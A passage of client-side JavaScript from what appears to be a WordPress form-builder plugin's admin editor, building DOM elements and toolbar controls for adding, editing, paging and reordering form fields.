				wdform_field_in_editor.innerHTML=document.getElementById('form_maker_editor').value;
		}
		else
		{
			i=gen;
			gen++;
			
			
			var wdform_row = document.createElement('div');
				wdform_row.setAttribute("wdid", i);
				wdform_row.setAttribute("type", "type_section_break");
				wdform_row.setAttribute("class", "wdform_tr_section_break");
		
			var wdform_field = document.createElement('div');
				wdform_field.setAttribute("id", "wdform_field"+i);
				wdform_field.setAttribute("type", "type_section_break");
				wdform_field.setAttribute("class", "wdform_field_section_break");
				
			var wdform_arrows = document.createElement('div');
				wdform_arrows.setAttribute("id", "wdform_arrows"+i);
				wdform_arrows.setAttribute("class", "wdform_arrows");
			
			wdform_field.appendChild(wdform_arrows);
		//	wdform_row.appendChild(wdform_arrows);
			wdform_row.appendChild(wdform_field);

			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			wdform_page=document.getElementById('form_id_tempform_view'+form_view);

			var img_X = document.createElement("img");
					img_X.setAttribute("src", plugin_url + "/images/delete_el.png");
					img_X.setAttribute("title", "Remove the field");
					img_X.setAttribute("onclick", 'remove_section_break("'+i+'")');
					img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("div");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", plugin_url + "/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
					img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("div");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", plugin_url + "/images/duplicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.setAttribute("onclick", 'duplicate("'+i+'")');
					img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"duplicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"duplicate")');
					
			var td_DUBLICATE = document.createElement("div");
					td_DUBLICATE.setAttribute("id", "duplicate_"+i);
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var in_editor = document.createElement("div");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
         			in_editor.setAttribute("class", 'wdform_section_break');


			ifr_id = "form_maker_editor_ifr";
			ifr=getIFrameDocument(ifr_id)

			if(document.getElementById('form_maker_editor').style.display=="none")
			{
				in_editor.innerHTML=ifr.body.innerHTML;
			}
			else
			{
				in_editor.innerHTML=document.getElementById('form_maker_editor').value;
			}
			
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			wdform_field.appendChild(in_editor);
			td_EDIT.appendChild(label);

			wdform_arrows.appendChild(td_X);
			wdform_arrows.appendChild(td_EDIT);
			wdform_arrows.appendChild(td_DUBLICATE);

			
			beforeTr=wdform_page.lastChild;
			wdform_page.insertBefore(wdform_row, beforeTr);
				
			wdform_section_new=document.createElement('div');
				wdform_section_new.setAttribute('class','wdform_section');
				
			wdform_column_new=document.createElement('div');
				wdform_column_new.setAttribute('class','wdform_column');
				
			wdform_column_new1=document.createElement('div');
      wdform_column_new1.setAttribute('class','wdform_column');
			
			wdform_section_new.appendChild(wdform_column_new);
			wdform_section_new.appendChild(wdform_column_new1);
			
			beforeTr=wdform_page.lastChild;
			wdform_page.insertBefore(wdform_section_new, beforeTr);
				
			j=2;
			
		}
    sortable_columns();
    if(document.getElementById('enable_sortable').value==0)
      jQuery('.wdform_column').sortable( "disable" );			
    else
      jQuery( ".wdform_arrows" ).hide();

	close_window();
	return;
	}

	
	if(document.getElementById("element_type").value=="type_page_navigation")
	{
		document.getElementById("pages").setAttribute('show_title',document.getElementById("el_show_title_input").checked);
		document.getElementById("pages").setAttribute('show_numbers',document.getElementById("el_show_numbers_input").checked);
	
		if(document.getElementById("el_pagination_steps").checked)
			{
				document.getElementById("pages").setAttribute('type','steps');
				make_page_steps_front();
			}
		else
			if(document.getElementById("el_pagination_percentage").checked)
			{
				document.getElementById("pages").setAttribute('type','percentage');
				make_page_percentage_front();
			}
			else
			{
				document.getElementById("pages").setAttribute('type','none');
				make_page_none_front();
			}
		
		refresh_page_numbers();
		close_window() ;
		
		return;

	}

	if(document.getElementById("element_type").value=="type_page_break")
	{
		if(document.getElementById("editing_id").value)
		{	
			i=document.getElementById("editing_id").value;
			form_view_element	=document.getElementById('form_id_tempform_view'+i);
			page_title			=document.getElementById('_div_between').getAttribute('page_title');
			next_title			=document.getElementById('_div_between').getAttribute('next_title');
			next_type			=document.getElementById('_div_between').getAttribute('next_type');
			next_class			=document.getElementById('_div_between').getAttribute('next_class');
			next_checkable		=document.getElementById('_div_between').getAttribute('next_checkable');
			previous_title		=document.getElementById('_div_between').getAttribute('previous_title');
			previous_type		=document.getElementById('_div_between').getAttribute('previous_type');
			previous_class		=document.getElementById('_div_between').getAttribute('previous_class');
			previous_checkable	=document.getElementById('_div_between').getAttribute('previous_checkable');
			form_view_element.setAttribute('next_title',next_title);
			form_view_element.setAttribute('next_type',next_type);
			form_view_element.setAttribute('next_class',next_class);
			form_view_element.setAttribute('next_checkable',next_checkable);
			form_view_element.setAttribute('previous_title',previous_title);
			form_view_element.setAttribute('previous_type',previous_type);
			form_view_element.setAttribute('previous_class',previous_class);
			form_view_element.setAttribute('previous_checkable',previous_checkable);
			form_view_element.setAttribute('page_title',page_title);
			
			var input = document.getElementById('_div_between'); 
			atr=input.attributes;
			for(v=0;v<30;v++)
				if(atr[v] )
				{
					if(atr[v].name.indexOf("add_")==0)
					{
						form_view_element.setAttribute(atr[v].name,atr[v].value);
					}
				}
				
		if(form_view_count!=1)

			generate_page_nav(form_view);
			sortable_columns();
			if(document.getElementById('enable_sortable').value==0)
				jQuery('.wdform_column').sortable( "disable" );			
			else
				jQuery( ".wdform_arrows" ).hide();
			close_window() ;
			return;
		}
		else
		{	

		for(t=form_view_max; t>0; t--)
		{
			if(document.getElementById('form_id_tempform_view'+t))
			{
					form_view=t;
					break;
			}
		}
		
		
		

		if(form_view_count==1)
		{
			
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", plugin_url + "/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the pagination options");
					img_EDIT.style.cssText = "margin-left:40px; cursor:pointer";
					img_EDIT.setAttribute("onclick", 'el_page_navigation()');
					
			var td_EDIT = document.getElementById("edit_page_navigation");
					td_EDIT.appendChild(img_EDIT);
			
			document.getElementById('page_navigation').appendChild(td_EDIT);

		}
		
		old_to_gen=form_view;
		
		form_view_max++;
		form_view_count++;
		form_view=form_view_max;
		
		table=document.createElement('div');
			table.setAttribute('class','wdform-page-and-images');
			table.style.cssText = "display:table; border-top:1px solid black";
 
 
		tbody=document.createElement('div');
			tbody.setAttribute('id','form_id_tempform_view'+form_view);
			tbody.setAttribute('page_title','Untitled Page');
			tbody.setAttribute('class','wdform_page');

		tbody_img=document.createElement('div');
			tbody_img.setAttribute('id','form_id_tempform_view_img'+form_view);
			tbody_img.style.cssText = "float:right";
			
		tr_img=document.createElement('div');

		var	img=document.createElement('img');
			img.setAttribute('src',plugin_url + '/images/minus.png');
			img.setAttribute('title','Show or hide the page');
			img.setAttribute("class", "page_toolbar");
			img.setAttribute('id','show_page_img_'+form_view);
			img.setAttribute('onClick','show_or_hide("'+form_view+'")');
			img.setAttribute("onmouseover", 'chnage_icons_src(this,"minus")');
			img.setAttribute("onmouseout", 'chnage_icons_src(this,"minus")');

		var img_X = document.createElement("img");
			img_X.setAttribute("src", plugin_url + "/images/page_delete.png?ver=1.8.0");
			img_X.setAttribute('title','Delete the page');
			img_X.setAttribute("class", "page_toolbar");
			img_X.setAttribute("onclick", 'remove_page("'+form_view+'")');
			img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete")');
			img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete")');
		
		var img_X_all = document.createElement("img");
			img_X_all.setAttribute("src", plugin_url + "/images/page_delete_all.png");
			img_X_all.setAttribute('title','Delete the page with fields');
			img_X_all.setAttribute("class", "page_toolbar");
			img_X_all.setAttribute("onclick", 'remove_page_all("'+form_view+'")');
			img_X_all.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete_all")');
			img_X_all.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete_all")');
			
		var img_EDIT = document.createElement("img");
			img_EDIT.setAttribute("src", plugin_url + "/images/page_edit.png");
			img_EDIT.setAttribute('title','Edit the page');
			img_EDIT.setAttribute("class", "page_toolbar");
			img_EDIT.setAttribute("onclick", 'edit_page_break("'+form_view+'")');
			img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"page_edit")');
			img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"page_edit")');
			
		tr_img.appendChild(img);
		tr_img.appendChild(img_X);
		tr_img.appendChild(img_X_all);
		tr_img.appendChild(img_EDIT);
		tbody_img.appendChild(tr_img);
			
			
		tr=document.createElement('div');
			tr.setAttribute('class','wdform_section');

			tr_page_nav=document.createElement('div');
				tr_page_nav.setAttribute('valign','top');
				tr_page_nav.setAttribute('class','wdform_footer');
				tr_page_nav.style.width="100%";
				
			td_page_nav=document.createElement('div');
				td_page_nav.style.width="100%";
				
			table_min_page_nav=document.createElement('div');
				table_min_page_nav.style.width="100%";
				table_min_page_nav.style.display="table";
				
			tbody_min_page_nav=document.createElement('div');
				tbody_min_page_nav.style.display="table-row-group";
			tr_min_page_nav=document.createElement('div');
				tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
				tr_min_page_nav.style.display="table-row";
					
		table_min=document.createElement('div');
			table_min.setAttribute('class','wdform_column');

      table_min1=document.createElement('div');
			table_min1.setAttribute('class','wdform_column');
	
      tr.appendChild(table_min);
      tr.appendChild(table_min1);
		
			tbody_min_page_nav.appendChild(tr_min_page_nav);
			table_min_page_nav.appendChild(tbody_min_page_nav);
			td_page_nav.appendChild(table_min_page_nav);
			tr_page_nav.appendChild(td_page_nav);
		tbody.appendChild(tr);
		tbody.appendChild(tr_page_nav);
		table.appendChild(tbody);
		table.appendChild(tbody_img);
		
		document.getElementById('take').appendChild(table);	
	
		form_view_element	=document.getElementById('form_id_tempform_view'+form_view);
		page_title			=document.getElementById('_div_between').getAttribute('page_title');
		next_title			=document.getElementById('_div_between').getAttribute('next_title');
		next_type			=document.getElementById('_div_between').getAttribute('next_type');
		next_class			=document.getElementById('_div_between').getAttribute('next_class');
		next_checkable		=document.getElementById('_div_between').getAttribute('next_checkable');
		previous_title		=document.getElementById('_div_between').getAttribute('previous_title');
		previous_type		=document.getElementById('_div_between').getAttribute('previous_type');
		previous_class		=document.getElementById('_div_between').getAttribute('previous_class');
		previous_checkable	=document.getElementById('_div_between').getAttribute('previous_checkable');
		form_view_element.setAttribute('next_title',next_title);
		form_view_element.setAttribute('next_type',next_type);
		form_view_element.setAttribute('next_class',next_class);
		form_view_element.setAttribute('next_checkable',next_checkable);
		form_view_element.setAttribute('previous_title',previous_title);
		form_view_element.setAttribute('previous_type',previous_type);
		form_view_element.setAttribute('previous_class',previous_class);
		form_view_element.setAttribute('previous_checkable',previous_checkable);
		form_view_element.setAttribute('page_title',page_title);
			
		
		var input = document.getElementById('_div_between'); 
		atr=input.attributes;
		
		for(v=0;v<30;v++)
			if(atr[v] )
			{
				if(atr[v].name.indexOf("add_")==0)
				{
					form_view_element.setAttribute(atr[v].name,atr[v].value);
				}
			}
			
	if(form_view_count==2)
	{
		generate_page_nav(form_view);
		generate_page_nav(old_to_gen);
	/*	show_form_view(form_view);
		show_form_view(old_to_gen);*/
	}
	else
		generate_page_nav(form_view);
    sortable_columns();
		if(document.getElementById('enable_sortable').value==0)
			jQuery('.wdform_column').sortable( "disable" );			
		else
			jQuery( ".wdform_arrows" ).hide();
		close_window() ;

		return;
		
		}  
		
	}
	
	form_view=0;
	for(t=form_view_max; t>0; t--)
	{
		if(document.getElementById('form_id_tempform_view'+t))
			if(jQuery("#form_id_tempform_view"+t).is(":visible"))
			{
				form_view=t;
				break;
			}
	}

	if(form_view==0)
	{	alert("The pages are closed");
		return;
	}

	if (!document.getElementById('editing_id').value) if (key == 0) if (field_limitation) if (vorchjogen(key)) { return };
	if(document.getElementById('main_editor').style.display=="block")
	{
		if(document.getElementById('editing_id').value)
		{
			i=document.getElementById('editing_id').value;		
				document.getElementById('editing_id').value="";
			wdform_field=document.getElementById("wdform_field"+i);
			destroyChildren(wdform_field);

			
			ifr_id = "form_maker_editor_ifr";
			ifr=getIFrameDocument(ifr_id);
			if(document.getElementById('form_maker_editor').style.display=="none")
			{
				wdform_field.innerHTML=ifr.body.innerHTML;
			}
			else
			{
				wdform_field.innerHTML=document.getElementById('form_maker_editor').value;
			}
			
			j=2;
			
		}
		else
		{
			i=gen;
			gen++;
			
				
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			l=document.getElementById('form_id_tempform_view'+form_view).childNodes.length;
			wdform_column=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-2].firstChild;

			var wdform_row = document.createElement('div');
				wdform_row.setAttribute("wdid", i);
				wdform_row.setAttribute("class", "wdform_row ui-sortable-handle");
		
			var wdform_field = document.createElement('div');
				wdform_field.setAttribute("id", "wdform_field"+i);
				wdform_field.setAttribute("type", "type_editor");
				wdform_field.setAttribute("class", "wdform_field");
				wdform_field.style.cssText = 'margin-top:0px';
				
			var wdform_arrows = document.createElement('div');
				wdform_arrows.setAttribute("id", "wdform_arrows"+i);
				wdform_arrows.setAttribute("class", "wdform_arrows");
				wdform_arrows.setAttribute("type", "type_editor");
				wdform_arrows.style.cssText = 'margin-top:0px';
				
			wdform_row.appendChild(wdform_arrows);
			wdform_row.appendChild(wdform_field);
			
			var img_X = document.createElement("img");
					img_X.setAttribute("src", plugin_url + "/images/delete_el.png");
					img_X.setAttribute("title", "Remove the field");
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
					img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("div");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", plugin_url + "/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
					img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("div");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);

			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", plugin_url + "/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
					img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("div");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", plugin_url + "/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
					img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("div");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", plugin_url + "/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
					img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("div");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", plugin_url + "/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
					img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("div");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", plugin_url + "/images/duplicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.setAttribute("onclick", 'duplicate("'+i+'")');
					img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"duplicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"duplicate")');
					
			var td_DUBLICATE = document.createElement("div");
					td_DUBLICATE.setAttribute("id", "duplicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", plugin_url + "/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
					img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEUP = document.createElement("div");
					td_PAGEUP.setAttribute("id", "page_up_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", plugin_url + "/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower page");
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
					img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEDOWN = document.createElement("div");
					td_PAGEDOWN.setAttribute("id", "page_down_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEDOWN);
					

		ifr_id = "form_maker_editor_ifr";
		ifr=getIFrameDocument(ifr_id)

		if(document.getElementById('form_maker_editor').style.display=="none")
		{
				wdform_field.innerHTML=ifr.body.innerHTML;
		}
		else
		{
				wdform_field.innerHTML=document.getElementById('form_maker_editor').value;
		}
			
			
			
			var label = document.createElement('span');
				label.setAttribute("id", i+"_element_labelform_id_temp");
				label.innerHTML = "custom_"+i;
				label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);

			wdform_arrows.appendChild(td_X);
			wdform_arrows.appendChild(td_LEFT);
			wdform_arrows.appendChild(td_UP);
			wdform_arrows.appendChild(td_DOWN);
			wdform_arrows.appendChild(td_RIGHT);
			wdform_arrows.appendChild(td_EDIT);
			wdform_arrows.appendChild(td_DUBLICATE);
			wdform_arrows.appendChild(td_PAGEUP);
			wdform_arrows.appendChild(td_PAGEDOWN);

			if(document.getElementById('pos_end').checked)
			{
				wdform_column.appendChild(wdform_row);
			}
			if(document.getElementById('pos_begin').checked)
			{	
				wdform_column.insertBefore(wdform_row, wdform_column.firstChild);
			}
			if(document.getElementById('pos_before').checked)
			{
				beforeTr=document.getElementById("wdform_field"+document.getElementById('sel_el_pos').value).parentNode;
				wdform_column=beforeTr.parentNode;
				beforeOption=document.getElementById(document.getElementById('sel_el_pos').value+'_sel_el_pos');
				wdform_column.insertBefore(wdform_row, beforeTr);
				select_.insertBefore(option, beforeOption);
			}
			j=2;
			;
		
		}

	close_window();
	}


	else
	if(document.getElementById('show_table').innerHTML)
	{
		
		if(document.getElementById('editing_id').value)
			i=document.getElementById('editing_id').value;		
		else
			i=gen;
			
		type=document.getElementById("element_type").value;
		if(type=="type_hidden")
		{
			if(document.getElementById(i+'_elementform_id_temp').name=="")
			{
				alert("The name of the field is required.");
				return;
			}
		}
		
		if(type=="type_map")
		{
			if(typeof gmapdata[i] == "undefined" || typeof gmapdata[i].getCenter() == "undefined"){
				alert("Please go to Global Options to setup the Map API key. It may take up to 5 minutes for API key change to take effect.");
				return false;
			}
			else
				if_gmap_updateMap(i);
		}
		
		if(type=="type_mark_map")
		{
			if(typeof gmapdata[i] == "undefined" || typeof gmapdata[i].getCenter() == "undefined"){
				alert("Please go to Global Options to setup the Map API key. It may take up to 5 minutes for API key change to take effect.");
				return false;
			}
			else
				if_gmap_updateMap(i);
		}
	
	
		if(document.getElementById(i+'_element_labelform_id_temp').innerHTML)
		{

		if(document.getElementById('editing_id').value)
		{
			Disable();
			i=document.getElementById('editing_id').value;		
			in_lab=false;
			labels_array=new Array();
			for(w=0; w<gen;w++)
			{	
				if(w!=i)
				if(document.getElementById(w+'_element_labelform_id_temp'))
					labels_array.push(document.getElementById(w+'_element_labelform_id_temp').innerHTML);
			}			
	
			for(t=0; t<labels_array.length;t++)
			{	
			if(document.getElementById(i+'_element_labelform_id_temp').innerHTML==labels_array[t])
				{
					in_lab=true;
					break;
				}
			}
			if(in_lab)
			{
				alert('Sorry, the labels must be unique.');
				return;
			}
			else
			{
	
	
	
	
				document.getElementById('editing_id').value="";
	
				wdform_field=document.getElementById("wdform_field"+i);
        wdform_arrows=document.getElementById("wdform_arrows"+i);
				destroyChildren(wdform_field);
	
	
						var add1 = document.getElementById(i+'_label_sectionform_id_temp');
						var add2 = document.getElementById(i+'_element_sectionform_id_temp');
						wdform_field.appendChild(wdform_arrows);
						wdform_field.appendChild(add1);
						wdform_field.appendChild(add2);
	
	
				j=2;
	
				close_window() ;
				
			call(i,key);
			}
		}
		else
		{	
		i=gen;
		in_lab=false;
		labels_array=new Array();
		for(w=0; w<gen;w++)
		{	
			if(document.getElementById(w+'_element_labelform_id_temp'))
				labels_array.push(document.getElementById(w+'_element_labelform_id_temp').innerHTML);
		}			
		for(t=0; t<labels_array.length;t++)
		{	
		if(document.getElementById(i+'_element_labelform_id_temp').innerHTML==labels_array[t])
			{
				in_lab=true;
				break;
			}
		}
		if(in_lab)
		{
			alert('Sorry, the labels must be unique.');
			return
		}
		else
		{
			
			if(type=="type_address")
				gen=gen+6;
			else
				gen++;			
				
			l=document.getElementById('form_id_tempform_view'+form_view).childNodes.length;
			
			wdform_column=document.getElementById('form_id_tempform_view'+form_view).childNodes[l-2].firstChild;
					
			var wdform_row = document.createElement('div');
				wdform_row.setAttribute("wdid", i);
				wdform_row.setAttribute("class", "wdform_row ui-sortable-handle");
		
			var wdform_field = document.createElement('div');
				wdform_field.setAttribute("id", "wdform_field"+i);
				wdform_field.setAttribute("type", type);
				wdform_field.setAttribute("class", "wdform_field");
				wdform_field.style.display="table-cell";
				
			var wdform_arrows = document.createElement('div');
				wdform_arrows.setAttribute("id", "wdform_arrows"+i);
				wdform_arrows.setAttribute("class", "wdform_arrows");
				
			wdform_row.appendChild(wdform_arrows);
			wdform_row.appendChild(wdform_field);
			
			
			
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML=document.getElementById(i+'_element_labelform_id_temp').innerHTML;

			var img_X = document.createElement("img");
					img_X.setAttribute("src", plugin_url + "/images/delete_el.png");
					img_X.setAttribute("title", "Remove the field");
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
					img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("div");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", plugin_url + "/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
					img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("div");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", plugin_url + "/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
					img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("div");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", plugin_url + "/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
					img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("div");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", plugin_url + "/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
					img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("div");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", plugin_url + "/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
					img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("div");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", plugin_url + "/images/duplicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.setAttribute("onclick", 'duplicate("'+i+'")');
					img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"duplicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"duplicate")');
					
			var td_DUBLICATE = document.createElement("div");
					td_DUBLICATE.setAttribute("id", "duplicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);

			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", plugin_url + "/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
					img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEUP = document.createElement("div");
